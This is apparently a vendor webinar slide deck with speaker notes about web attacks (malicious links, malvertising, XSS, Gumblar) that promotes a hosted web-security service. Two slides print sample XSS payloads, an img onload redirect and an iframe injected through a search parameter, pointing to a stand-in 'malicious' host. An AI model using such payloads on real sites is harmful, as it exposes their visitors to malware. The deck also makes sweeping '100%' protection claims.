Anatomy of a Web Attack1
AgendaChallenges Corporation Face Web Usage StatisticsWeb AttacksSolving the ProblemMessageLabs Services
The ChallengeThe Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats: Productivity Offensive Materials Abuse of resources Malware
Lots of websitesAverage 2,465 new malware websites per day.
Why malware?Monetize the attack.Install my software – botnet  - spam / DDOS
Steal your credentials  - bank theft / fraud
Steal your data – confidential data / fraudHow do you get it?Bad LinksAdvertisingXSSGumblarServices 6
Getting Web MalwareBad Linkpostcard.jpg.exe
Advertise ItSubvert a legitimate websiteAdverts
Fake AV Advert
XSS AttackUser contentNo. Your wrong.Duh! Its “you’re”.I agree. <img src=“/images/smiley.gif” 	onload=“document.location=‘http://malicious/’”>
XSS IFrame Attackhttp://genuine/index.php?search="'><iframe src="http://malicious“ height=“100%" width=“100%"></iframe>http://genuine/index.php?search="'>%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%61%6C%69%63%69%6F%75%73%201C%20%0A%68%65%69%67%68%74%3D%201C%31%30%30%25%22%20%77%69%64%74%68%3D%201C%31%30%30%25%22%3E%0A%3C%2F%69%66%72%61%6D%65%3E%0A
Web MalwareMalwareMalicious instructionsBrowser / JS / Flash / PDFComplete controlVictimBad Guy
Gumblar LifecycleUser visits website with XSS exploitUser is forwarded to host serving malwareMalware installed (often flash or PDF)Malware steals website logins,	forwards to hackerHacker logs into website, installs XSS exploit
Gumblar PrevalanceUp to 60% of all malicious web traffic is Gumblar.
How You Can Protect Yourself15
Controlling the webIT Management should first consider controlling the Web;Policy engine includes:Categorised URL databaseMIME and file type lists Time periodsUser and group based policiesCustomizable block messagesControls HTTP and HTTPS
Building the policyNo access to travel, leisure and sport between 9am and 5pmNo access to sex, guns or drugsNo access to streaming audio and video (reduce bandwidth)Only support can download executables
Monitoring accessDashboard – 1 year of high level informationDetailed reports up to 6 months of URL and Malware informationCustomizable reports in PDF formatScheduled reports sent directly to your inbox
Malware ProtectionScans HTTP and FTP/HTTP trafficMultiple signature based AV enginesSkeptic technologyCustomizable block messagesConverged analysisNo noticeable latency
You have choices for Web Security20
Why use a hosted services over hardware or software?
Why use MessageLabs Services?Best Client and Technical Support Global Support is 24/7/365 & included with the serviceSupport SLA protects your businessAlways get a live person who speaks your languageDedicated CSM teamBest ServicesAwarding WinningAnalyst approvedBacked by strongest SLAs
Most Robust Global InfrastructureIncorporating 14 data centers spanning four continentsEvery data center is scalable and secured to the highest standardsClustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated23
Best Service Level AgreementsWebAnti-Virus Protection  100% protection from known and unknown email virusesCredit is offered if a client infected by a virusAnti-Virus Protection  100% protection against known virusesCredit is offered if a client infected by a virusEmailArchivingLatency  Average scanning time of 100% of web content is within 100 millisecondsCredit is offered if latency exceeds 100 millisecondsVirus False Positives  0.0001% FP capture rateCredit is offered if we do not meet this commitmentService Availability  100% uptimeCredit is offered if availability falls below 100%Client may terminate if availability falls below 95%Spam Capture Rate  99% capture rate (95% for emails containing Asian characters)Credit is offered if we do not meet this commitmentSupportService Availability Guarantee 99.9% uptime for archiving networkClient may terminate if availability falls below 90%Spam False Positives  0.0003% FP capture rateCredit is offered if we do not meet this commitmentAppliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no costLatency  Average roundtrip time of 100% of email delivered in less than 60 secondsCredit is offered if latency exceeds 1 minuteDelivery  100% delivery guaranteeClient may terminate if we do not meet thisTechnical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrsCredit is offered if we do not meet this commitmentService Availability  100% uptimeCredit is offered if availability falls below 100%Client may terminate if availability falls below 95%
Best Shared IntelligenceAccuracy, Reliability & PerformanceThe automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.
Q&AVisit: www.MessageLabs.comPhone: 866.460.0000Email: Lrothman@MessageLabs.com26

Anatomy Web Attack

  • 1.
    Anatomy of aWeb Attack1
  • 2.
    AgendaChallenges Corporation FaceWeb Usage StatisticsWeb AttacksSolving the ProblemMessageLabs Services
  • 3.
    The ChallengeThe Acmecorporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats: Productivity Offensive Materials Abuse of resources Malware
  • 4.
    Lots of websitesAverage2,465 new malware websites per day.
  • 5.
    Why malware?Monetize theattack.Install my software – botnet - spam / DDOS
  • 6.
    Steal your credentials - bank theft / fraud
  • 7.
    Steal your data– confidential data / fraudHow do you get it?Bad LinksAdvertisingXSSGumblarServices 6
  • 8.
    Getting Web MalwareBadLinkpostcard.jpg.exe
  • 9.
    Advertise ItSubvert alegitimate websiteAdverts
  • 10.
  • 11.
    XSS AttackUser contentNo.Your wrong.Duh! Its “you’re”.I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”>
  • 12.
    XSS IFrame Attackhttp://genuine/index.php?search="'><iframesrc="http://malicious“ height=“100%" width=“100%"></iframe>http://genuine/index.php?search="'>%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%61%6C%69%63%69%6F%75%73%201C%20%0A%68%65%69%67%68%74%3D%201C%31%30%30%25%22%20%77%69%64%74%68%3D%201C%31%30%30%25%22%3E%0A%3C%2F%69%66%72%61%6D%65%3E%0A
  • 13.
    Web MalwareMalwareMalicious instructionsBrowser/ JS / Flash / PDFComplete controlVictimBad Guy
  • 14.
    Gumblar LifecycleUser visitswebsite with XSS exploitUser is forwarded to host serving malwareMalware installed (often flash or PDF)Malware steals website logins, forwards to hackerHacker logs into website, installs XSS exploit
  • 15.
    Gumblar PrevalanceUp to60% of all malicious web traffic is Gumblar.
  • 16.
    How You CanProtect Yourself15
  • 17.
    Controlling the webITManagement should first consider controlling the Web;Policy engine includes:Categorised URL databaseMIME and file type lists Time periodsUser and group based policiesCustomizable block messagesControls HTTP and HTTPS
  • 18.
    Building the policyNoaccess to travel, leisure and sport between 9am and 5pmNo access to sex, guns or drugsNo access to streaming audio and video (reduce bandwidth)Only support can download executables
  • 19.
    Monitoring accessDashboard –1 year of high level informationDetailed reports up to 6 months of URL and Malware informationCustomizable reports in PDF formatScheduled reports sent directly to your inbox
  • 20.
    Malware ProtectionScans HTTPand FTP/HTTP trafficMultiple signature based AV enginesSkeptic technologyCustomizable block messagesConverged analysisNo noticeable latency
  • 21.
    You have choicesfor Web Security20
  • 22.
    Why use ahosted services over hardware or software?
  • 23.
    Why use MessageLabsServices?Best Client and Technical Support Global Support is 24/7/365 & included with the serviceSupport SLA protects your businessAlways get a live person who speaks your languageDedicated CSM teamBest ServicesAwarding WinningAnalyst approvedBacked by strongest SLAs
  • 24.
    Most Robust GlobalInfrastructureIncorporating 14 data centers spanning four continentsEvery data center is scalable and secured to the highest standardsClustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated23
  • 25.
    Best Service LevelAgreementsWebAnti-Virus Protection  100% protection from known and unknown email virusesCredit is offered if a client infected by a virusAnti-Virus Protection  100% protection against known virusesCredit is offered if a client infected by a virusEmailArchivingLatency  Average scanning time of 100% of web content is within 100 millisecondsCredit is offered if latency exceeds 100 millisecondsVirus False Positives  0.0001% FP capture rateCredit is offered if we do not meet this commitmentService Availability  100% uptimeCredit is offered if availability falls below 100%Client may terminate if availability falls below 95%Spam Capture Rate  99% capture rate (95% for emails containing Asian characters)Credit is offered if we do not meet this commitmentSupportService Availability Guarantee 99.9% uptime for archiving networkClient may terminate if availability falls below 90%Spam False Positives  0.0003% FP capture rateCredit is offered if we do not meet this commitmentAppliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no costLatency  Average roundtrip time of 100% of email delivered in less than 60 secondsCredit is offered if latency exceeds 1 minuteDelivery  100% delivery guaranteeClient may terminate if we do not meet thisTechnical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrsCredit is offered if we do not meet this commitmentService Availability  100% uptimeCredit is offered if availability falls below 100%Client may terminate if availability falls below 95%
  • 26.
    Best Shared IntelligenceAccuracy,Reliability & PerformanceThe automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.
  • 27.
  • 28.
    Special Thanks27Martin Lee MIET CISSPResearch & Response TeamSymantec Hosted Services

Editor's Notes

  • #2 Kelly: Welcome to today’s session Anatomy of a Web Attack. Today, we will review an increasingly sophisticated and hostile environment that exists in today&apos;s Internet. In the case of those looking to harm your business, you have several things to consider. Our speaker Lee Rothman will walk you through the various types of attacks, the reason we think malware exists through the Web and what you can do to protect your business. Lee Rothman joined Symantec Hosted Services in 2006 as the principal system engineer of North America. Lee joined the engineering team with 10 years of Internet and security experience, specializing in Internetworking. Prior to Symantec Hosted Services, Lee spent several years as a sales engineer for a large integrator and was product marketing manager for a large Fortune 500 company. Lee acts as a product expert in North America and aids the Sales, Product, and Marketing teams. Lee, can you please take us through today’s session?
  • #3 Today’s agenda is pretty simple. We are going to first go through the business challenges that companies face when it comes to the Web. I’ll then cover some statistics around the Web and how employees are using the Web in your organization. Finally, I will walk through a few examples of how attacks happen through the Internet. Finally, I will give some basic suggestions on how you can solve this problem.
  • #4 Let’s first explore the business challenge. Disclaimer, Acme is not a real company. In this example, the Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats. As a business, Acme is really looking to solve these four issues. Productivity Offensive Materials Abuse of resources MalwareMost companies now face this challenge and are trying to manage this very real issue. Most companies haven’t really put a security issue in place because the security of the Web has not been an issue (or so they think) in their business. However, if we look at the data we can see some really compelling reasons why security for web should be considered.
  • #7 Now that we know why they do it, what are the ways in which they get introduced to a company? I’ve put these types of attacks into 5 categoriesBad LinksAdvertisingXSSGumblar Web ServicesLet’s explore these categories in-depth.
  • #18 Second, IT Managers should consider putting policies in place.
  • #19 Third, IT Managers should consider monitoring their environments.
  • #20 Lastly, IT Managers should be sure they have a malware protection place that is effective.
  • #28 It’s important that we give a special thanks to our malware team in particular Martin Lee from our research and response team. Without his help, this webcast would not be possible.